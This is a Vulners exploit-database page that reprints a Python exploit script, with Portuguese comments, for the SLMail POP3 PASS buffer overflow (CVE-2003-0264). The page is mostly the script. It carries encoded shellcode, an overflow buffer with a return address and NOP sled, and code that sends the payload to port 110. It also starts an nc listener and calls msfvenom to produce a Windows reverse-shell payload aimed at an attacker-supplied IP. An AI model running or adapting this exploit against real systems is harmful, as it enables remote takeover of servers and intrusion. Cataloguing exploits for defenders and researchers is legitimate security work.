Vulners
Lucene search
Seattle Lab Mail (SLMail) 5.1.0.4420 Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | SLMail SMTP Multiple Overflows | 18 Aug 200400:00 | – | nessus |
| SLMail < 5.1.0.4433 Multiple Command Remote Overflows | 7 May 200300:00 | – | nessus |
 | CVE-2003-0264 | 30 Apr 201000:00 | – | circl |
 | CVE-2003-0264 | 8 May 200304:00 | – | cve |
 | CVE-2003-0264 | 8 May 200304:00 | – | cvelist |
 | Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit) | 30 Apr 201000:00 | – | exploitdb |
 | Seattle Lab Mail 5.5 POP3 Buffer Overflow | 7 Jan 200706:27 | – | metasploit |
 | CVE-2003-0264 | 27 May 200304:00 | – | nvd |
 | SLMail 5.1.0.4420 Remote Code Execution | 24 Feb 202100:00 | – | packetstorm |
# -*- coding: utf-8 -*-
import socket
from time import sleep
from os import system
system("clear")
print 'Shell-code-foi-informada?\r\n'
print '[1] sim'
print '[2] nao\n'
quest = int(input('>>> '))
def main():
system("clear")
#============================
#--ensira-sua-shell-code-aqui
buf = ""
buf += "\xb8\xaa\x62\xd3\xea\xda\xd4\xd9\x74\x24\xf4\x5e\x29"
buf += "\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x44\x9e\x31"
buf += "\x1f\x64\xb7\x34\xe0\x94\x48\x59\x68\x71\x79\x59\x0e"
buf += "\xf2\x2a\x69\x44\x56\xc7\x02\x08\x42\x5c\x66\x85\x65"
buf += "\xd5\xcd\xf3\x48\xe6\x7e\xc7\xcb\x64\x7d\x14\x2b\x54"
buf += "\x4e\x69\x2a\x91\xb3\x80\x7e\x4a\xbf\x37\x6e\xff\xf5"
buf += "\x8b\x05\xb3\x18\x8c\xfa\x04\x1a\xbd\xad\x1f\x45\x1d"
buf += "\x4c\xf3\xfd\x14\x56\x10\x3b\xee\xed\xe2\xb7\xf1\x27"
buf += "\x3b\x37\x5d\x06\xf3\xca\x9f\x4f\x34\x35\xea\xb9\x46"
buf += "\xc8\xed\x7e\x34\x16\x7b\x64\x9e\xdd\xdb\x40\x1e\x31"
#===========================
print 'Exploit - CVE-2003-0264\nplatfor: windows\nPOP3 SLmail-5.5 overflow :)'
print '\nby: - Mednic -\r\n'
host = raw_input('Host: ')
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 39 + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sleep(3)
print '\nIniciando conexão ao servidor...\n'
sleep(2)
try:
s.connect((host, 110))
s.recv(1024)
except:
print 'Conexão recusada !'
exit()
s.settimeout(1)
print '\nEnviando usuario...\n'
s.send("USER guest\r\n")
s.recv(1024)
s.settimeout(1)
print '\nIniciando estouro de buffer...\n'
system('nc -nlvp 444')
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()
if quest == 1:
main()
elif quest == 2:
print "IP para conexão reversa !"
ip = raw_input('>>> ')
system('clear')
system('msfvenom -p windows/shell_reverse_tcp LHOST='+ip+" LPORT=444 -b "+'\\x00\\x0a\\x0d\\x20'+" -f python")
print '\r\nCopie e substitua pelo setado no codigo !'
else:
print 'Invalido argumento'
exit()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2021 00:00Current
0.1Low risk
Vulners AI Score0.1
CVSS 27.5
EPSS0.55213